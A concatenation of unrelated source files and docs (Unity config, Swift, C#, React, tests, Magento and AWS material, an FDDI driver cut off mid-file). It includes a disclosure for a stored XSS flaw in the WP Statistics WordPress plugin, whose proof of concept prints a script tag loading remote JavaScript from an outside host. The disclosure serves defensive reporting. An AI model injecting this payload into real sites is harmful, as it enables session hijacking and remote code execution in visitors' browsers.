(Partial Amendment of the Landslide Prevention Act)
Article 26
Omitted
(Partial Amendment of the Act on Emergency Measures for Road Development)
Article 27
Omitted
(Partial Amendment of the Act on Temporary Measures for the Development of Industrial Development Roads in Remote Areas)
Article 28
Omitted
(Partial Amendment of the River Act)
Article 29
Omitted
(Partial Amendment of the Act for the Enforcement of the River Act)
Article 30
Omitted
(Partial Amendment of the Act on Emergency Measures concerning the Development of Traffic Safety Facilities)
Article 31
Omitted
Chapter VII Ministry of Home Affairs
(Partial Amendment of the Act on Special Fiscal Measures for the Development of Areas around the New Tokyo International Airport)
Article 32
Omitted
(Partial Amendment of the Act on Special Fiscal Measures of the National Government for Pollution Prevention Projects)
Article 33
Omitted
Chapter VIII Fiscal and Financial Measures for Local Governments
(Fiscal and Financial Measures for Local Governments)
Article 34
With respect to local governments subject to the reduction of the national government's share or subsidy rates for the fiscal 1991 and fiscal 1992 budgets under the provisions of the acts as amended by this Act, the national government shall take fiscal and financial measures so that no hindrance arises in the execution of their affairs and projects or in their financial management.
Supplementary Provisions (Extract)
1
This Act shall come into force on April 1, 1991.
Supplementary Provisions (Act No. 8 of March 31, 1993) (Extract)
(Effective Date, etc.)
1
This Act shall come into force on April 1, 1993.
| {
"pile_set_name": "Github"
} |
%YAML 1.1
%TAG !u! tag:unity3d.com,2011:
--- !u!55 &1
PhysicsManager:
m_ObjectHideFlags: 0
serializedVersion: 3
m_Gravity: {x: 0, y: -9.81, z: 0}
m_DefaultMaterial: {fileID: 0}
m_BounceThreshold: 2
m_SleepThreshold: 0.005
m_DefaultContactOffset: 0.01
m_DefaultSolverIterations: 6
m_DefaultSolverVelocityIterations: 1
m_QueriesHitBackfaces: 0
m_QueriesHitTriggers: 1
m_EnableAdaptiveForce: 0
m_EnablePCM: 1
m_LayerCollisionMatrix: ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
| {
"pile_set_name": "Github"
} |
Expectations for DNS Seed operators
====================================
This document has been relocated to https://zcash.readthedocs.io/en/latest/rtd_pages/dnsseed_policy.html
The source for this document is available at https://gitlab.com/zcash-docs/zcash-docs/blob/master/source/rtd_pages/dnsseed_policy.rst | {
"pile_set_name": "Github"
} |
//
// ViewController.swift
// HysteriaPlayerSwiftExample
//
// Created by Stan on 8/17/15.
// Copyright © 2015 saiday. All rights reserved.
//
import UIKit
import HysteriaPlayer
class ViewController: UIViewController, HysteriaPlayerDelegate, HysteriaPlayerDataSource{
lazy var hysteriaPlayer = HysteriaPlayer.sharedInstance()
override func viewDidLoad() {
super.viewDidLoad()
// This is a very simple project that demonstrates how to use
// HysteriaPlayer in Swift; detailed instructions about
// HysteriaPlayer are included in the separate Objective-C example project.
initHysteriaPlayer()
hysteriaPlayer.fetchAndPlayPlayerItem(0)
}
func initHysteriaPlayer() {
hysteriaPlayer.delegate = self;
hysteriaPlayer.datasource = self;
}
func hysteriaPlayerNumberOfItems() -> Int {
return 3
}
func hysteriaPlayerURLForItemAtIndex(index: Int, preBuffer: Bool) -> NSURL! {
var url: NSURL
switch index {
case 0:
url = NSURL(string: "http://a929.phobos.apple.com/us/r1000/143/Music3/v4/2c/4e/69/2c4e69d7-bd0f-8c76-30ca-75f6a2f51ef5/mzaf_1157339944153759874.plus.aac.p.m4a")!;
break
case 1:
url = NSURL(string: "http://a1136.phobos.apple.com/us/r1000/042/Music5/v4/85/34/8d/85348d57-5bf9-a4a3-9f54-0c3f1d8bc6af/mzaf_5184604190043403959.plus.aac.p.m4a")!;
break
case 2:
url = NSURL(string: "http://a345.phobos.apple.com/us/r1000/046/Music5/v4/52/53/4b/52534b36-620e-d7f3-c9a8-2f9661652ff5/mzaf_2360247732780989514.plus.aac.p.m4a")!;
break
default:
url = NSURL()
break
}
return url;
}
func hysteriaPlayerReadyToPlay(identifier: HysteriaPlayerReadyToPlay) {
switch(identifier) {
case .CurrentItem:
hysteriaPlayer.play()
break
default:
break
}
}
}
| {
"pile_set_name": "Github"
} |
// ==========================================================================
// Squidex Headless CMS
// ==========================================================================
// Copyright (c) Squidex UG (haftungsbeschränkt)
// All rights reserved. Licensed under the MIT license.
// ==========================================================================
namespace Squidex.Domain.Apps.Entities.Schemas.Commands
{
public sealed class EnableField : FieldCommand
{
}
}
| {
"pile_set_name": "Github"
} |
===========================================================
Stored XSS Vulnerability in WP Statistics WordPress Plugin
===========================================================
.. contents:: Table of Contents
Overview
========
* Title: Stored XSS Vulnerability in the WP Statistics WordPress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/wp-statistics/
* Severity: Medium
* Versions Affected: 9.1.2 and most versions prior to it
* Version Tested: 9.1.2
* Version Patched: 9.1.3
Description
===========
Vulnerable Parameter
--------------------
* Check for online users every:
* Coefficient per visitor:
About Vulnerability
-------------------
This plugin is vulnerable to a stored cross-site scripting vulnerability. The issue can be exploited by administrator users with access to the WP Statistics settings page in WordPress; the parameters listed above are vulnerable to stored XSS. A malicious administrator can hijack other users' sessions, take control of another administrator's browser, or install malware on their computer.
Vulnerability Class
===================
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
Steps to Reproduce: (POC)
=========================
After installing the plugin:
* Go to Settings --> WP Statistics
* Put this payload into any of the vulnerable parameters listed above: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
* Click on Save Changes and you will see the XSS in action
* Reload the page or navigate back to it to confirm that the payload is stored ;)
Mitigation
==========
Update to 9.1.3
Change Log
==========
https://wordpress.org/plugins/wp-statistics/changelog/
Disclosure
==========
14-April-2015 Reported to developer
15-April-2015 Fixed by developer
15-April-2015 Public disclosure
Credits
=======
* Kaustubh Padwad
* Information Security Researcher
* [email protected]
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
| {
"pile_set_name": "Github"
} |
// @flow
import React, { PropTypes } from 'react';
import debounce from 'lodash.debounce';
import { List } from './List';
import { TextInput } from './forms/TextInput';
type Props = {
className?: string,
children?: ReactChildren,
style: Object,
data?: Array<Object>,
labelFunction?: Function,
disabled?: boolean,
keyFunction?: Function,
defaultStyles?: boolean,
defaultSelection?: Object,
onItemSelect?: Function,
listStyle: Object,
filterFunction: Function,
placeholder: string,
emptyText: string,
};
type State = {
text?: string,
};
function defaultFilterFunction(text, item) {
return item && item.toString().indexOf(text) >= 0;
}
/**
* Control that displays a List of items and allows for selection.
* Includes a text field above for quick filtering of items in the list.
* Provide a filterFunction that determines whether item should be displayed with text.
* See "List" component for more details.
*
* @property {string} className additional "class" to add to outermost element (alongside "FilterableList")
* @property {array} children React children
* @property {Object} style React style object to be applied to outer element.
* @property {array} [data] data to render in the list.
* @property {Function} [labelFunction] converts each object to a string in the default renderer.
* @property {Function} [keyFunction]
* @property {boolean} [defaultStyles] set "false" to remove all default styling from the List.
* @property {Object} [defaultSelection] item to select in the list by default
* @property {Function} [onItemSelect] callback when an item is selected, receiving listIndex and listItem.
*
* @property {Object} listStyle React style object to be applied to child List.
* @property {Function} filterFunction receives text, item; return true/false to show each item
* @property {string} placeholder text to display in filter input when empty
* @property {string} emptyText text to display when no matches occur
*/
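// Hypothetical usage sketch (data and handlers are illustrative):
//
//   <FilterableList
//     data={['apple', 'banana', 'cherry']}
//     placeholder="Search fruit..."
//     filterFunction={(text, item) => item.indexOf(text) >= 0}
//     onItemSelect={(index, item) => console.log(index, item)}
//   />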
export class FilterableList extends React.Component {
props: Props;
state: State;
static defaultProps: Props = {
style: {},
listStyle: {},
filterFunction: defaultFilterFunction,
placeholder: 'Search...',
emptyText: 'No matches.',
};
constructor(props: Props) {
super(props);
this.state = {};
}
_onFilterChange = debounce(text => {
this.setState({
text,
});
}, 250);
render() {
// passthrough props for List
const { keyFunction, labelFunction, listStyle, defaultStyles, defaultSelection, onItemSelect } = this.props;
const { data, disabled, emptyText, filterFunction, placeholder, style } = this.props;
const { text } = this.state;
const filtered = data ? data.filter(item => !text || filterFunction(text, item)) : [];
const noMatches = text && filtered.length === 0;
const listProps = {
labelFunction,
keyFunction,
defaultStyles,
defaultSelection,
onItemSelect,
};
const outerClass = this.props.className || '';
return (
<div className={`FilterableList ${outerClass}`} style={style}>
<TextInput placeholder={placeholder} disabled={disabled} onChange={text => this._onFilterChange(text)} iconLeft="ActionSearch" />
{noMatches && emptyText && <div className="FilterableList-empty-text">{emptyText}</div>}
{!noMatches && (
<List {...listProps} disabled={disabled} className="FilterableList-List" data={filtered} style={listStyle}>
{this.props.children}
</List>
)}
</div>
);
}
}
FilterableList.propTypes = {
// from List
className: PropTypes.string,
children: PropTypes.element,
style: PropTypes.object,
data: PropTypes.array,
disabled: PropTypes.bool,
labelFunction: PropTypes.func,
keyFunction: PropTypes.func,
defaultStyles: PropTypes.bool,
defaultSelection: PropTypes.any,
onItemSelect: PropTypes.func,
// for FilterableList
listStyle: PropTypes.object,
filterFunction: PropTypes.func,
placeholder: PropTypes.string,
emptyText: PropTypes.string,
};
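// Example usage (an illustrative sketch: `users` and its `name` field are
// hypothetical; adapt labelFunction/filterFunction to your own data):
//
// <FilterableList
//     data={users}
//     labelFunction={user => user.name}
//     filterFunction={(text, user) => user.name.indexOf(text) >= 0}
//     onItemSelect={(listIndex, listItem) => console.log('selected', listItem)}
// />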
| {
"pile_set_name": "Github"
} |
using Xunit;
using System.Linq;
namespace RDotNet
{
public class REngineCleanupTest : RDotNetTestFixture
{
[Fact]
public void TestDefaultClearGlobalEnv()
{
SetUpTest();
var engine = this.Engine;
engine.ClearGlobalEnvironment();
var s = engine.Evaluate("ls()").AsCharacter().ToArray();
Assert.True(s.Length == 0);
}
[Fact]
public void TestDetachPackagesDefault()
{
SetUpTest();
var engine = this.Engine;
var s = engine.Evaluate("search()").AsCharacter().ToArray();
Assert.False(s.Contains("package:lattice"));
Assert.False(s.Contains("package:Matrix"));
Assert.False(s.Contains("package:MASS"));
Assert.False(s.Contains("biopsy"));
engine.ClearGlobalEnvironment();
engine.Evaluate("library(lattice)");
engine.Evaluate("library(Matrix)");
engine.Evaluate("library(MASS)");
engine.Evaluate("data(biopsy, package='MASS')");
engine.Evaluate("attach(biopsy)");
s = engine.Evaluate("search()").AsCharacter().ToArray();
Assert.True(s.Contains("package:lattice"));
Assert.True(s.Contains("package:Matrix"));
Assert.True(s.Contains("package:MASS"));
Assert.True(s.Contains("biopsy"));
engine.ClearGlobalEnvironment(detachPackages: true);
s = engine.Evaluate("search()").AsCharacter().ToArray();
Assert.False(s.Contains("package:lattice"));
Assert.False(s.Contains("package:Matrix"));
Assert.False(s.Contains("package:MASS"));
Assert.False(s.Contains("biopsy"));
}
}
}
| {
"pile_set_name": "Github"
} |
"""Test file."""
import imp
import platform
from os import path
from unittest import TestCase
from EasyClangComplete.plugin.utils import file
from EasyClangComplete.plugin.utils import search_scope
imp.reload(file)
imp.reload(search_scope)
File = file.File
SearchScope = search_scope.TreeSearchScope
class test_file(TestCase):
"""Testing file related stuff."""
def test_find_file(self):
"""Test if we can find a file."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
search_scope = SearchScope(from_folder=current_folder,
to_folder=parent_folder)
file = File.search(
file_name='README.md',
search_scope=search_scope)
expected = path.join(parent_folder, 'README.md')
self.assertIsNotNone(file)
self.assertTrue(file.loaded())
self.assertEqual(file.full_path, expected)
def test_find_file_content_string(self):
"""Test if we can find a file."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
search_scope = SearchScope(from_folder=current_folder,
to_folder=parent_folder)
file = File.search(
file_name='README.md',
search_scope=search_scope,
search_content='plugin')
self.assertIsNotNone(file)
self.assertTrue(file.loaded())
expected = path.join(parent_folder, 'README.md')
self.assertEqual(file.full_path, expected)
file_fail = File.search(
file_name='README.md',
search_scope=search_scope,
search_content='text that is not in the file')
self.assertIsNone(file_fail)
def test_find_file_content_list(self):
"""Test if we can find a file."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
search_scope = SearchScope(from_folder=current_folder,
to_folder=parent_folder)
file = File.search(
file_name='README.md',
search_scope=search_scope,
search_content=['non existing text', 'plugin'])
self.assertIsNotNone(file)
self.assertTrue(file.loaded())
expected = path.join(parent_folder, 'README.md')
self.assertEqual(file.full_path, expected)
file_fail = File.search(
file_name='README.md',
search_scope=search_scope,
search_content=['non existing text'])
self.assertIsNone(file_fail)
def test_canonical_path(self):
"""Test creating canonical path."""
if platform.system() == "Windows":
original_path = "../hello/world.txt"
folder = "D:\\folder"
res = File.canonical_path(original_path, folder)
self.assertEqual(res, "D:\\hello\\world.txt")
else:
original_path = "../hello/world.txt"
folder = "/folder"
res = File.canonical_path(original_path, folder)
self.assertEqual(res, "/hello/world.txt")
def test_canonical_path_absolute(self):
"""Test creating canonical path."""
if platform.system() == "Windows":
original_path = "D:\\hello\\world.txt"
res = File.canonical_path(original_path)
self.assertEqual(res, "D:\\hello\\world.txt")
else:
original_path = "/hello/world.txt"
res = File.canonical_path(original_path)
self.assertEqual(res, "/hello/world.txt")
def test_canonical_path_empty(self):
"""Test failing for canonical path."""
original_path = None
res = File.canonical_path(original_path)
self.assertIsNone(res)
def test_temp_dir(self):
"""Test that we can expand star in path."""
temp_folder = File.get_temp_dir()
self.assertTrue(path.exists(temp_folder))
def test_ignore(self):
"""Test ignoring glob patterns."""
self.assertTrue(File.is_ignored('/tmp/hello', ['/tmp/*']))
self.assertTrue(File.is_ignored('/tmp/hello', ['/tmp*']))
self.assertTrue(File.is_ignored('/tmp/hello', ['', '/tmp*']))
self.assertTrue(File.is_ignored('/tmp/hello', ['', '/tmp/hell*']))
self.assertTrue(File.is_ignored('/tmp/hello/world', ['/tmp/*']))
self.assertFalse(File.is_ignored('/tmp/hello', ['/tmp/c*']))
def test_expand_all(self):
"""Test the globbing and wildcard expansion."""
current_dir_glob = path.join(path.dirname(__file__), '*')
result = File.expand_all(current_dir_glob)
self.assertIn(__file__, result)
result = File.expand_all(current_dir_glob, expand_globbing=False)
        self.assertEqual(len(result), 1)
self.assertIn(current_dir_glob, result)
path_with_wildcard = "hello$world"
wildcards = {"world": "BLAH"}
result = File.expand_all(path_with_wildcard, wildcard_values=wildcards)
        self.assertEqual(len(result), 1)
self.assertIn("helloBLAH", result)
| {
"pile_set_name": "Github"
} |
---
group: cloud-guide
title: Environment variables
functional_areas:
- Cloud
- Configuration
---
{{site.data.var.ece}} enables you to assign environment variables to override configuration options:
- [ADMIN]({{ site.baseurl }}/cloud/env/environment-vars_magento.html)—variables override project ADMIN variables
- [Global]({{ site.baseurl }}/cloud/env/variables-global.html)—variables affect each stage
- [Build]({{ site.baseurl }}/cloud/env/variables-build.html)—variables control build actions
- [Cloud]({{ site.baseurl }}/cloud/env/variables-cloud.html)—variables specific to {{site.data.var.ece}}
- [Deploy]({{ site.baseurl }}/cloud/env/variables-deploy.html)—variables control deploy actions
- [Post-deploy]({{ site.baseurl }}/cloud/env/variables-post-deploy.html)—variables control actions after deploy
Variables are _hierarchical_, which means that if a variable is not overridden, it is inherited from the parent environment.
You can set [ADMIN variables]({{ site.baseurl }}/cloud/env/environment-vars_magento.html) from the Project Web interface or using the Magento CLI. Use the [`.magento.env.yaml`]({{ site.baseurl }}/cloud/project/magento-env-yaml.html) file to manage other environment variables and to control build and deploy actions across all of your environments—including Pro Staging and Production—without requiring a support ticket.
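A minimal `.magento.env.yaml` sketch (the variable names below are illustrative examples, not a complete reference; see the variable pages above for the supported options):

```yaml
stage:
  global:
    SCD_ON_DEMAND: true        # Global variable: applies to every stage
  deploy:
    CLEAN_STATIC_FILES: false  # Deploy variable: controls a deploy action
```
| {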
"pile_set_name": "Github"
} |
/**
* Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
* SPDX-License-Identifier: Apache-2.0.
*/
#pragma once
#include <aws/lightsail/Lightsail_EXPORTS.h>
#include <aws/lightsail/LightsailRequest.h>
#include <aws/core/utils/memory/stl/AWSString.h>
#include <utility>
namespace Aws
{
namespace Lightsail
{
namespace Model
{
/**
*/
class AWS_LIGHTSAIL_API GetBlueprintsRequest : public LightsailRequest
{
public:
GetBlueprintsRequest();
        // Service request name is the operation name, which will send this request out;
        // each operation should have a unique request name, so that we can get the operation's name from this request.
        // Note: this is not true for responses; multiple operations may have the same response name,
        // so we cannot get the operation's name from a response.
inline virtual const char* GetServiceRequestName() const override { return "GetBlueprints"; }
Aws::String SerializePayload() const override;
Aws::Http::HeaderValueCollection GetRequestSpecificHeaders() const override;
/**
* <p>A Boolean value indicating whether to include inactive results in your
* request.</p>
*/
inline bool GetIncludeInactive() const{ return m_includeInactive; }
/**
* <p>A Boolean value indicating whether to include inactive results in your
* request.</p>
*/
inline bool IncludeInactiveHasBeenSet() const { return m_includeInactiveHasBeenSet; }
/**
* <p>A Boolean value indicating whether to include inactive results in your
* request.</p>
*/
inline void SetIncludeInactive(bool value) { m_includeInactiveHasBeenSet = true; m_includeInactive = value; }
/**
* <p>A Boolean value indicating whether to include inactive results in your
* request.</p>
*/
inline GetBlueprintsRequest& WithIncludeInactive(bool value) { SetIncludeInactive(value); return *this;}
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline const Aws::String& GetPageToken() const{ return m_pageToken; }
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline bool PageTokenHasBeenSet() const { return m_pageTokenHasBeenSet; }
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline void SetPageToken(const Aws::String& value) { m_pageTokenHasBeenSet = true; m_pageToken = value; }
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline void SetPageToken(Aws::String&& value) { m_pageTokenHasBeenSet = true; m_pageToken = std::move(value); }
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline void SetPageToken(const char* value) { m_pageTokenHasBeenSet = true; m_pageToken.assign(value); }
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline GetBlueprintsRequest& WithPageToken(const Aws::String& value) { SetPageToken(value); return *this;}
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline GetBlueprintsRequest& WithPageToken(Aws::String&& value) { SetPageToken(std::move(value)); return *this;}
/**
* <p>The token to advance to the next page of results from your request.</p> <p>To
* get a page token, perform an initial <code>GetBlueprints</code> request. If your
* results are paginated, the response will return a next page token that you can
* specify as the page token in a subsequent request.</p>
*/
inline GetBlueprintsRequest& WithPageToken(const char* value) { SetPageToken(value); return *this;}
private:
bool m_includeInactive;
bool m_includeInactiveHasBeenSet;
Aws::String m_pageToken;
bool m_pageTokenHasBeenSet;
};
} // namespace Model
} // namespace Lightsail
} // namespace Aws
| {
"pile_set_name": "Github"
} |
/******************************************************************************
*
* (C)Copyright 1998,1999 SysKonnect,
* a business unit of Schneider & Koch & Co. Datensysteme GmbH.
*
* See the file "skfddi.c" for further information.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* The information in this file is provided "AS IS" without warranty.
*
******************************************************************************/
/*
PCM
Physical Connection Management
*/
/*
 * Hardware independent state machine implementation
* The following external SMT functions are referenced :
*
* queue_event()
* smt_timer_start()
* smt_timer_stop()
*
* The following external HW dependent functions are referenced :
* sm_pm_control()
* sm_ph_linestate()
* sm_pm_ls_latch()
*
* The following HW dependent events are required :
* PC_QLS
* PC_ILS
* PC_HLS
* PC_MLS
* PC_NSE
* PC_LEM
*
*/
#include "h/types.h"
#include "h/fddi.h"
#include "h/smc.h"
#include "h/supern_2.h"
#define KERNEL
#include "h/smtstate.h"
#ifndef lint
static const char ID_sccs[] = "@(#)pcmplc.c 2.55 99/08/05 (C) SK " ;
#endif
#ifdef FDDI_MIB
extern int snmp_fddi_trap(
#ifdef ANSIC
struct s_smc * smc, int type, int index
#endif
);
#endif
#ifdef CONCENTRATOR
extern int plc_is_installed(
#ifdef ANSIC
struct s_smc *smc ,
int p
#endif
) ;
#endif
/*
* FSM Macros
*/
#define AFLAG (0x20)
#define GO_STATE(x) (mib->fddiPORTPCMState = (x)|AFLAG)
#define ACTIONS_DONE() (mib->fddiPORTPCMState &= ~AFLAG)
#define ACTIONS(x) (x|AFLAG)
/*
* PCM states
*/
#define PC0_OFF 0
#define PC1_BREAK 1
#define PC2_TRACE 2
#define PC3_CONNECT 3
#define PC4_NEXT 4
#define PC5_SIGNAL 5
#define PC6_JOIN 6
#define PC7_VERIFY 7
#define PC8_ACTIVE 8
#define PC9_MAINT 9
/*
* symbolic state names
*/
static const char * const pcm_states[] = {
"PC0_OFF","PC1_BREAK","PC2_TRACE","PC3_CONNECT","PC4_NEXT",
"PC5_SIGNAL","PC6_JOIN","PC7_VERIFY","PC8_ACTIVE","PC9_MAINT"
} ;
/*
* symbolic event names
*/
static const char * const pcm_events[] = {
"NONE","PC_START","PC_STOP","PC_LOOP","PC_JOIN","PC_SIGNAL",
"PC_REJECT","PC_MAINT","PC_TRACE","PC_PDR",
"PC_ENABLE","PC_DISABLE",
"PC_QLS","PC_ILS","PC_MLS","PC_HLS","PC_LS_PDR","PC_LS_NONE",
"PC_TIMEOUT_TB_MAX","PC_TIMEOUT_TB_MIN",
"PC_TIMEOUT_C_MIN","PC_TIMEOUT_T_OUT",
"PC_TIMEOUT_TL_MIN","PC_TIMEOUT_T_NEXT","PC_TIMEOUT_LCT",
"PC_NSE","PC_LEM"
} ;
#ifdef MOT_ELM
/*
* PCL-S control register
* this register in the PLC-S controls the scrambling parameters
*/
#define PLCS_CONTROL_C_U 0
#define PLCS_CONTROL_C_S (PL_C_SDOFF_ENABLE | PL_C_SDON_ENABLE | \
PL_C_CIPHER_ENABLE)
#define PLCS_FASSERT_U 0
#define PLCS_FASSERT_S 0xFd76 /* 52.0 us */
#define PLCS_FDEASSERT_U 0
#define PLCS_FDEASSERT_S 0
#else /* nMOT_ELM */
/*
* PCL-S control register
* this register in the PLC-S controls the scrambling parameters
* can be patched for ANSI compliance if standard changes
*/
static const u_char plcs_control_c_u[17] = "PLC_CNTRL_C_U=\0\0" ;
static const u_char plcs_control_c_s[17] = "PLC_CNTRL_C_S=\01\02" ;
#define PLCS_CONTROL_C_U (plcs_control_c_u[14] | (plcs_control_c_u[15]<<8))
#define PLCS_CONTROL_C_S (plcs_control_c_s[14] | (plcs_control_c_s[15]<<8))
#endif /* nMOT_ELM */
/*
* external vars
*/
/* struct definition see 'cmtdef.h' (also used by CFM) */
#define PS_OFF 0
#define PS_BIT3 1
#define PS_BIT4 2
#define PS_BIT7 3
#define PS_LCT 4
#define PS_BIT8 5
#define PS_JOIN 6
#define PS_ACTIVE 7
#define LCT_LEM_MAX 255
/*
* PLC timing parameter
*/
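/* PLC_MS(m): convert m milliseconds to a PLC timer preload value (the timer counts up from the preload to 0x10000) */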
#define PLC_MS(m) ((int)((0x10000L-(m*100000L/2048))))
#define SLOW_TL_MIN PLC_MS(6)
#define SLOW_C_MIN PLC_MS(10)
static const struct plt {
int timer ; /* relative plc timer address */
int para ; /* default timing parameters */
} pltm[] = {
{ PL_C_MIN, SLOW_C_MIN }, /* min t. to remain Connect State */
{ PL_TL_MIN, SLOW_TL_MIN }, /* min t. to transmit a Line State */
{ PL_TB_MIN, TP_TB_MIN }, /* min break time */
{ PL_T_OUT, TP_T_OUT }, /* Signaling timeout */
{ PL_LC_LENGTH, TP_LC_LENGTH }, /* Link Confidence Test Time */
{ PL_T_SCRUB, TP_T_SCRUB }, /* Scrub Time == MAC TVX time ! */
{ PL_NS_MAX, TP_NS_MAX }, /* max t. that noise is tolerated */
{ 0,0 }
} ;
/*
* interrupt mask
*/
#ifdef SUPERNET_3
/*
 * Do we need the EBUF error during signaling, too, to detect the
 * SUPERNET_3 PLL bug?
*/
static const int plc_imsk_na = PL_PCM_CODE | PL_TRACE_PROP | PL_PCM_BREAK |
PL_PCM_ENABLED | PL_SELF_TEST | PL_EBUF_ERR;
#else /* SUPERNET_3 */
/*
* We do NOT need the elasticity buffer error during signaling.
*/
static int plc_imsk_na = PL_PCM_CODE | PL_TRACE_PROP | PL_PCM_BREAK |
PL_PCM_ENABLED | PL_SELF_TEST ;
#endif /* SUPERNET_3 */
static const int plc_imsk_act = PL_PCM_CODE | PL_TRACE_PROP | PL_PCM_BREAK |
PL_PCM_ENABLED | PL_SELF_TEST | PL_EBUF_ERR;
/* internal functions */
static void pcm_fsm(struct s_smc *smc, struct s_phy *phy, int cmd);
static void pc_rcode_actions(struct s_smc *smc, int bit, struct s_phy *phy);
static void pc_tcode_actions(struct s_smc *smc, const int bit, struct s_phy *phy);
static void reset_lem_struct(struct s_phy *phy);
static void plc_init(struct s_smc *smc, int p);
static void sm_ph_lem_start(struct s_smc *smc, int np, int threshold);
static void sm_ph_lem_stop(struct s_smc *smc, int np);
static void sm_ph_linestate(struct s_smc *smc, int phy, int ls);
static void real_init_plc(struct s_smc *smc);
/*
* SMT timer interface
* start PCM timer 0
*/
static void start_pcm_timer0(struct s_smc *smc, u_long value, int event,
struct s_phy *phy)
{
phy->timer0_exp = FALSE ; /* clear timer event flag */
smt_timer_start(smc,&phy->pcm_timer0,value,
EV_TOKEN(EVENT_PCM+phy->np,event)) ;
}
/*
* SMT timer interface
* stop PCM timer 0
*/
static void stop_pcm_timer0(struct s_smc *smc, struct s_phy *phy)
{
if (phy->pcm_timer0.tm_active)
smt_timer_stop(smc,&phy->pcm_timer0) ;
}
/*
init PCM state machine (called by driver)
clear all PCM vars and flags
*/
void pcm_init(struct s_smc *smc)
{
int i ;
int np ;
struct s_phy *phy ;
struct fddi_mib_p *mib ;
for (np = 0,phy = smc->y ; np < NUMPHYS ; np++,phy++) {
/* Indicates the type of PHY being used */
mib = phy->mib ;
mib->fddiPORTPCMState = ACTIONS(PC0_OFF) ;
phy->np = np ;
switch (smc->s.sas) {
#ifdef CONCENTRATOR
case SMT_SAS :
mib->fddiPORTMy_Type = (np == PS) ? TS : TM ;
break ;
case SMT_DAS :
mib->fddiPORTMy_Type = (np == PA) ? TA :
(np == PB) ? TB : TM ;
break ;
case SMT_NAC :
mib->fddiPORTMy_Type = TM ;
break;
#else
case SMT_SAS :
mib->fddiPORTMy_Type = (np == PS) ? TS : TNONE ;
mib->fddiPORTHardwarePresent = (np == PS) ? TRUE :
FALSE ;
#ifndef SUPERNET_3
smc->y[PA].mib->fddiPORTPCMState = PC0_OFF ;
#else
smc->y[PB].mib->fddiPORTPCMState = PC0_OFF ;
#endif
break ;
case SMT_DAS :
mib->fddiPORTMy_Type = (np == PB) ? TB : TA ;
break ;
#endif
}
/*
* set PMD-type
*/
phy->pmd_scramble = 0 ;
switch (phy->pmd_type[PMD_SK_PMD]) {
case 'P' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_MULTI ;
break ;
case 'L' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_LCF ;
break ;
case 'D' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_TP ;
break ;
case 'S' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_TP ;
phy->pmd_scramble = TRUE ;
break ;
case 'U' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_TP ;
phy->pmd_scramble = TRUE ;
break ;
case '1' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_SINGLE1 ;
break ;
case '2' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_SINGLE2 ;
break ;
case '3' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_SINGLE2 ;
break ;
case '4' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_SINGLE1 ;
break ;
case 'H' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_UNKNOWN ;
break ;
case 'I' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_TP ;
break ;
case 'G' :
mib->fddiPORTPMDClass = MIB_PMDCLASS_TP ;
break ;
default:
mib->fddiPORTPMDClass = MIB_PMDCLASS_UNKNOWN ;
break ;
}
/*
* A and B port can be on primary and secondary path
*/
switch (mib->fddiPORTMy_Type) {
case TA :
mib->fddiPORTAvailablePaths |= MIB_PATH_S ;
mib->fddiPORTRequestedPaths[1] = MIB_P_PATH_LOCAL ;
mib->fddiPORTRequestedPaths[2] =
MIB_P_PATH_LOCAL |
MIB_P_PATH_CON_ALTER |
MIB_P_PATH_SEC_PREFER ;
mib->fddiPORTRequestedPaths[3] =
MIB_P_PATH_LOCAL |
MIB_P_PATH_CON_ALTER |
MIB_P_PATH_SEC_PREFER |
MIB_P_PATH_THRU ;
break ;
case TB :
mib->fddiPORTAvailablePaths |= MIB_PATH_S ;
